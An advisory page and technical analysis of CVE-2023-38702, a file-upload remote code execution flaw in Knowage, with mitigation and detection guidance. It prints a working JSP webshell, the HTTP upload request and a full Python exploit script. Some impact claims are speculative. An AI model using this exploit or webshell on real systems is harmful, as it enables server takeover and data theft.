CVE-2023-38702
CVE-2023-38702
9.9
CriticalPublished:
Last updated:
Source:security-advisories@github.com
Modified
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- Low
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
Knowage is an open source analytics and business intelligence suite. Starting in the 6.x.x branch and prior to version 8.1.8, the endpoint `/knowage/restful-services/dossier/importTemplateFile` allows authenticated users to upload `template file` on the server, but does not need any authorization to be reached. When the JSP file is uploaded, the attacker just needs to connect to `/knowageqbeengine/foo.jsp` to gain code execution on the server. By exploiting this vulnerability, an attacker with low privileges can upload a JSP file to the `knowageqbeengine` directory and gain code execution capability on the server. This issue has been patched in Knowage version 8.1.8.
Comprehensive Technical Analysis of CVE-2023-38702 (Knowage Authenticated RCE Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2023-38702 CVSS Score: 9.9 (Critical) – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Vulnerability Type: Authenticated Remote Code Execution (RCE) via Unrestricted File Upload Exploitability Metrics:
- Attack Vector (AV): Network (Exploitable remotely)
- Attack Complexity (AC): Low (No special conditions required)
- Privileges Required (PR): Low (Authenticated user with minimal privileges)
- User Interaction (UI): None
- Scope (S): Changed (Impacts the entire Knowage server)
- Confidentiality (C): High (Full system compromise possible)
- Integrity (I): High (Arbitrary code execution)
- Availability (A): High (Denial of service or full takeover)
Severity Justification
The vulnerability is critical due to:
- Low barrier to exploitation (only requires low-privilege authentication).
- High impact (arbitrary code execution on the server).
- No authorization checks on the vulnerable endpoint, allowing any authenticated user to upload malicious files.
- Immediate RCE upon successful exploitation, enabling full system compromise.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Workflow
-
Authentication:
- An attacker must first authenticate to the Knowage application (even with minimal privileges, such as a "Viewer" role).
- Credentials can be obtained via:
- Phishing attacks.
- Credential stuffing (if weak/default passwords are used).
- Exploiting other vulnerabilities (e.g., weak session management).
-
Malicious File Upload:
- The attacker sends a POST request to:
/knowage/restful-services/dossier/importTemplateFile - The endpoint does not enforce authorization checks, allowing any authenticated user to upload files.
- The attacker uploads a JSP (Java Server Pages) webshell disguised as a "template file."
- The attacker sends a POST request to:
-
Code Execution:
- The uploaded JSP file is stored in the
knowageqbeenginedirectory. - The attacker accesses the webshell via:
/knowageqbeengine/[malicious_file].jsp - This executes arbitrary Java code on the server, granting full RCE.
- The uploaded JSP file is stored in the
Example Exploit (Proof of Concept)
POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1
Host: vulnerable-knowage-server.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Cookie: JSESSIONID=[VALID_SESSION_ID]
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="exploit.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
%>
------WebKitFormBoundary--
Triggering the Exploit:
GET /knowageqbeengine/exploit.jsp?cmd=id HTTP/1.1
Host: vulnerable-knowage-server.com
Expected Output:
uid=0(root) gid=0(root) groups=0(root)
Post-Exploitation Impact
- Full system compromise (reverse shell, data exfiltration, lateral movement).
- Persistence mechanisms (cron jobs, backdoors, rootkits).
- Data theft (database access, sensitive reports, credentials).
- Denial of Service (DoS) (crashing the server or deleting critical files).
3. Affected Systems and Software Versions
| Software | Affected Versions | Patched Version |
|---|---|---|
| Knowage Server | 6.x.x – 8.1.7 | 8.1.8 |
| Knowage Suite (all components) | All versions prior to 8.1.8 | 8.1.8 |
Note:
- The vulnerability exists in the
/knowage/restful-services/dossier/importTemplateFileendpoint. - The
knowageqbeenginedirectory is writable by the application, allowing JSP execution.
4. Recommended Mitigation Strategies
Immediate Actions
-
Apply the Patch (Highest Priority):
- Upgrade to Knowage 8.1.8 or later.
- Verify the patch by checking the GitHub advisory (GHSA-7mjh-73q3-c3fc).
-
Temporary Workarounds (If Patch Cannot Be Applied Immediately):
- Disable the vulnerable endpoint via web server rules (e.g., Apache/Nginx
denydirectives). - Restrict file uploads to only allow specific MIME types (e.g.,
.xls,.csv) and block.jsp,.war,.jspx. - Implement strict authorization checks on the
/dossier/importTemplateFileendpoint (e.g., require admin privileges). - Monitor and block suspicious JSP file uploads using a Web Application Firewall (WAF).
- Disable the vulnerable endpoint via web server rules (e.g., Apache/Nginx
-
Network-Level Protections:
- Isolate the Knowage server in a segmented network.
- Restrict access to the Knowage application via IP whitelisting.
- Enable logging and alerting for file uploads to
/knowageqbeengine/.
-
User Access Controls:
- Enforce least privilege (avoid granting unnecessary upload permissions).
- Rotate credentials for all Knowage users.
- Enable Multi-Factor Authentication (MFA) for Knowage access.
Long-Term Security Hardening
- Regular vulnerability scanning (e.g., Nessus, OpenVAS, Burp Suite).
- File integrity monitoring (FIM) to detect unauthorized JSP file creation.
- Application security testing (SAST/DAST) for custom Knowage deployments.
- Incident response planning for RCE scenarios.
5. Impact on the Cybersecurity Landscape
Broader Implications
-
Increased Attack Surface for Business Intelligence (BI) Tools:
- Knowage is widely used in enterprise analytics, making it a high-value target.
- Similar vulnerabilities in BI tools (e.g., Tableau, Power BI) could lead to data breaches and corporate espionage.
-
Exploitation in Ransomware & APT Campaigns:
- Ransomware groups (e.g., LockBit, BlackCat) may exploit this for initial access.
- Advanced Persistent Threats (APTs) could use it for lateral movement in targeted attacks.
-
Supply Chain Risks:
- Knowage is often integrated with ERP, CRM, and database systems, increasing the risk of supply chain attacks.
- Compromised Knowage instances could lead to data exfiltration from connected systems.
-
Regulatory & Compliance Risks:
- GDPR, HIPAA, SOX violations if sensitive data is exposed.
- PCI DSS non-compliance if payment data is stored in Knowage reports.
Threat Actor Motivations
| Threat Actor | Likely Exploitation Goal |
|---|---|
| Cybercriminals | Ransomware deployment, data theft for extortion. |
| APT Groups | Espionage, intellectual property theft. |
| Insider Threats | Unauthorized data access, sabotage. |
| Script Kiddies | Defacement, bragging rights. |
6. Technical Details for Security Professionals
Root Cause Analysis
- Missing Authorization Check:
- The
/dossier/importTemplateFileendpoint does not verify user permissions, allowing any authenticated user to upload files.
- The
- Insecure File Upload Handling:
- The application does not validate file extensions or content, permitting
.jspfiles. - Uploaded files are stored in a web-accessible directory (
knowageqbeengine), enabling direct execution.
- The application does not validate file extensions or content, permitting
Exploitation Requirements
| Requirement | Details |
|---|---|
| Authentication | Valid Knowage credentials (even low-privilege). |
| Network Access | HTTP/HTTPS access to the Knowage server. |
| File Upload | Ability to send a POST request with a malicious .jsp file. |
| Execution | Direct access to the uploaded JSP file via /knowageqbeengine/. |
Detection & Forensics
-
Log Analysis:
- Check access logs for:
POST /knowage/restful-services/dossier/importTemplateFileGET /knowageqbeengine/*.jsp
- Look for unusual file uploads (e.g.,
.jsp,.war,.jspx).
- Check access logs for:
-
File System Forensics:
- Search for unexpected
.jspfiles in:/opt/knowage/tomcat/webapps/knowageqbeengine/ - Check timestamps for recently modified files.
- Search for unexpected
-
Network Traffic Analysis:
- Monitor for outbound connections from the Knowage server (e.g., reverse shells, C2 traffic).
-
Endpoint Detection & Response (EDR):
- Detect unusual child processes of the Knowage Tomcat service.
- Alert on Java-based webshell execution.
Proof-of-Concept (PoC) Exploit Code (For Authorized Testing Only)
import requests
import sys
target = "http://vulnerable-knowage-server.com"
username = "low_priv_user"
password = "password123"
jsp_payload = """<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
%>"""
def exploit():
# Authenticate
session = requests.Session()
login_url = f"{target}/knowage/restful-services/2.0/backend/login"
login_data = {"user": username, "password": password}
response = session.post(login_url, json=login_data)
if response.status_code != 200:
print("[!] Authentication failed")
sys.exit(1)
# Upload malicious JSP
upload_url = f"{target}/knowage/restful-services/dossier/importTemplateFile"
files = {"file": ("exploit.jsp", jsp_payload, "application/octet-stream")}
response = session.post(upload_url, files=files)
if response.status_code == 200:
print("[+] JSP uploaded successfully")
else:
print("[!] Upload failed")
sys.exit(1)
# Trigger RCE
rce_url = f"{target}/knowageqbeengine/exploit.jsp?cmd=id"
response = session.get(rce_url)
print("[+] Command output:")
print(response.text)
if __name__ == "__main__":
exploit()
Mitigation Verification
-
Test the Patch:
- Attempt to upload a
.jspfile after upgrading to Knowage 8.1.8. - Verify that the endpoint rejects unauthorized uploads.
- Attempt to upload a
-
Penetration Testing:
- Use Burp Suite or OWASP ZAP to test for:
- Unauthorized file uploads.
- Directory traversal in file paths.
- JSP execution in web-accessible directories.
- Use Burp Suite or OWASP ZAP to test for:
-
Hardening Checklist:
- Knowage is updated to 8.1.8+.
- File upload restrictions are enforced.
- WAF rules block
.jspuploads. - Least privilege is enforced for Knowage users.
- Logging and monitoring are enabled for file uploads.
Conclusion
CVE-2023-38702 is a critical RCE vulnerability in Knowage that allows low-privilege authenticated users to execute arbitrary code on the server. Due to its low exploitation complexity and high impact, organizations must patch immediately and implement defensive controls to prevent exploitation.
Key Takeaways for Security Teams: ✅ Patch Knowage to 8.1.8+ (highest priority). ✅ Restrict file uploads to prevent JSP execution. ✅ Monitor for exploitation attempts (log analysis, EDR). ✅ Enforce least privilege for Knowage users. ✅ Conduct penetration testing to verify mitigations.
Failure to address this vulnerability could lead to full system compromise, data breaches, and regulatory penalties. Organizations should treat this as a critical incident response scenario if exploitation is suspected.
References
security-advisories@github.com
https://github.com/KnowageLabs/Knowage-Server/security/advisories/GHSA-7mjh-73q3-c3fcaf854a3a-2127-422b-91ae-364da2661108
https://github.com/KnowageLabs/Knowage-Server/security/advisories/GHSA-7mjh-73q3-c3fc